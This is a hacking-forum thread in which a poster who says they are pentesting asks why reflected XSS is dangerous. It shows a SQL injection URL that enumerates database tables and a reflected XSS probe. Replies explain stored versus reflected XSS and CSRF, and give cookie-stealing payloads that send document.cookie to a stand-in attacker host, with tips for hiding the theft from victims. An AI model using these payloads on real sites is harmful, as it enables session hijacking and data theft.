I don't really get XSS

[Cherchemin]

Hi there,

I'm currently doing some blind pentesting and found good old SQL injection vulnerabilty which looks like :

index.php?var1=something&id_stuff=1 union all select 1,table_name,3 from information_schema.tables--

So clearly "id_stuff" is wide open (as far as i can tell, it only escapes quotes).

But i also saw that whatever i type in "id_stuff", it is then repeated on the resulting webpage.
So if i'm learning right, that's called a XSS vulnerability. I then tried this :

index.php?var1=something&id_stuff=1--<PLAINTEXT>

and saw the resulting page was showing sourcecode (So the plaintext tag was doing his job)

Still i don't really get how this kind of XSS attack is dangerous. (I'm myself much better at doing SQL injection ones)
As my "defacing" is only shown to me, i don't understand how you can exploit such vulnerabilities. Everything i read on the Net always show a wonderful alert in javascript which is pretty useless in my case (since there is no cookie to steal and my injection doesn't last)

So what XSS is really good for ?

P.S.: On a side note, i'm going to suggest in my pentesting report that the "id_stuff" should be int only. I suppose it's enough to fix the whole thing ?

[tremor77]

What you are creating is a temporary XSS, injecting code that is only run by you... the danger is in this particular case showing source code... but not a permanent defacement of the webpage.

Permanent XSS on the other hand is quite dangerous. This is generally due to an unsanitized user input box, url get, etc.., which could potentially end up saving malicious code int he database or the page itself.

I think the way to take advantage of a temporary XSS exploit, however... is to using a referral link send browsers to that exploit in such a manner as that they load a cookie stealer into the site. something like...

Code: Select all

<a href="xyz.com/login.php?var1=<script src="abc.com/cookiestealer.js">CLICK HERE TO LOGIN TO XYZ.COM</a>

my example is rough.. but thats the general concept... its not the site that has the vulnerability but the users visiting the site are vulnerable.

sanddbox will correct me if i'm wrong

[fashizzlepop]

Yup, you got it tremor. Of course, if other parts of the site are vulnerable, this could also be one way to spread an XSS worm.

[0xBEEF1337]

Delete.

[Cherchemin]

Thanks for the reply. I won't say XSS is now clearer to me but your answers help !

Time for some more reading about XSS i guess

[sanddbox]

Tremor: That example wouldn't work. I believe this would:

Code: Select all

<script>window.location="http://myevilsite.com/cookiestealer.php?cookies=" + document.cookie;</script>

If you don't want your victim to know they're getting wtfpwned, instead of just redirecting them as in the above example, embed the link in an image tag. It's the same concept, though.

[fashizzlepop]

Also check out CSRF exploits. Along the same lines.

[Cryptovirus]

CSRF exploits aren't exactly along the same lines. CSRF is more dangerous in that your browser doesn't have to "see" active content such as JavaScript, so an image laced with a simple malicious src is enough.

Temporary XSS is much more worthless, although "dangerous" in the sense that cookies could be stolen - however, stealing cookies in this manner is...inelegant, so to speak.

Although you could also post forms using such XSS, making it equivalent to CSRF - even so, the ability of CSRF to hide in plain sight (server side redirects + image) without the need to lure victims to other websites is priceless.